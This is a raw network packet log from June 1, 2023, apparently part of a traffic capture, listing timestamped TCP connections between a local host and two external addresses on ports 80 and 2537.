Jun 1, 2023 22:35:36.188126087 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188144922 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188164949 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188180923 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188199997 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188205957 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188218117 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188236952 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188255072 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188272953 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188278913 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188278913 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188292027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188313007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188330889 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188334942 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188349962 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188368082 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188386917 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188390970 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188402891 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188405037 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188424110 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188442945 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188452959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188452959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188461065 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188479900 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188498020 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188502073 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188502073 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188519955 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188538074 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188556910 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188575983 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188594103 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188599110 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188599110 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188612938 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188631058 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188649893 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188668013 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188685894 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188699007 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188699007 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188704967 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188723087 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188741922 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188746929 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188746929 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188760042 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188779116 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188796043 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188796043 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188796997 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188816071 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188833952 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188843966 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188843966 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188853025 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188870907 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188889027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188894033 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188894033 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188894033 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188908100 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188926935 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188941956 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188945055 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188963890 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188982964 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188992023 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188992023 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.189001083 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.189019918 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.189089060 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.189089060 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.189138889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.189138889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.189138889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.349163055 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349356890 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349426031 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349529028 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349637032 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349699020 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.349745989 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349770069 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.349812031 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349910021 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349976063 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.349982023 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350038052 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350157976 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350178957 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350193024 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350220919 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350238085 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350332022 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350344896 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350409031 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350445032 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350511074 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350543022 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350569010 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350608110 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350635052 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350697994 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350742102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350742102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350760937 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350811005 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350811005 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.350825071 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350929022 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.350979090 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351032019 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351038933 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351102114 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351157904 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351166010 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351214886 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351232052 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351295948 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351358891 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351376057 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351423979 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351435900 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351435900 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351488113 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351551056 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351577997 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351577997 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351613998 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351645947 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351676941 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351741076 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351792097 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351793051 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351804018 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351861000 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351867914 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351931095 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.351979017 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351979971 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.351994038 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352051973 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352102995 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352108002 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352154970 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352169991 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352232933 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352296114 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352333069 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352333069 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352358103 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.352402925 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352524996 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.352525949 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.512067080 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.512331009 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.672475100 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.672936916 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.833081007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.833417892 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.993278027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.993474007 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.153538942 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.153795004 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.313971043 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.314287901 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.474473000 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.474796057 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.634656906 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.634931087 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.794723034 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.795048952 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:37.954907894 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:37.955144882 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.115281105 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.115580082 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.275604010 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.275847912 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.436192036 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.436599970 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.596930027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.597197056 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.757535934 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.757958889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:38.918304920 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:38.918711901 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.078898907 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.079288960 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.239567041 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.239830017 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.400357008 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.400684118 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.560884953 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.561376095 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.721307993 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.721523046 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:39.881505966 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:39.881772041 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.041909933 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.042207956 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.202217102 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.202608109 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.362626076 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.362865925 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.522727966 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.522998095 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.682893038 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.683079004 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:40.842875004 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:40.843122959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.002895117 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.003179073 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.163091898 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.163383961 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.190047026 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.190507889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.323271036 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.323535919 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.483488083 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.483697891 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.643733025 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.644010067 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.803909063 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.804047108 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:41.964229107 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:41.964605093 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.125035048 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.125435114 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.285747051 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.286171913 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.446343899 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.446671009 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.606748104 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.607011080 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.766978979 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.767231941 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:42.927217007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:42.927567005 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:43.087510109 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:43.087833881 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:43.088001013 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:43.247653961 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:36:40.668461084 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.686626911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.686830044 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.686949968 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.704850912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.715476990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.715488911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.715656996 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.727150917 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.755032063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.761662960 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.820636034 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832223892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832314968 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832364082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832406044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832470894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832508087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.832561970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832597017 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.832636118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832693100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.832725048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.832842112 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.833395958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.833468914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.834054947 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.834621906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.834686041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.835015059 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.835952044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.850940943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.851005077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.851286888 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.851584911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.851645947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.851808071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.852791071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.852855921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.853146076 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.854119062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.854195118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.854496002 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.855360031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.855424881 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.855703115 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.856708050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.856772900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.856920004 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.857927084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.857992887 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.858203888 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.859137058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.859200954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.859364986 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.860488892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.860553026 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.860713959 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.861581087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.861644983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.861885071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.862884045 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.862967968 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.863890886 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.864059925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.864144087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.864468098 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.869554996 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.869620085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.869996071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.870183945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.870265007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.870390892 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.871140957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.871205091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.871495962 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.872169971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.872237921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.872387886 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.873071909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.873136044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.873370886 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.874021053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.874088049 CEST	2537	49850	45.66.230.155	192.168.11.20
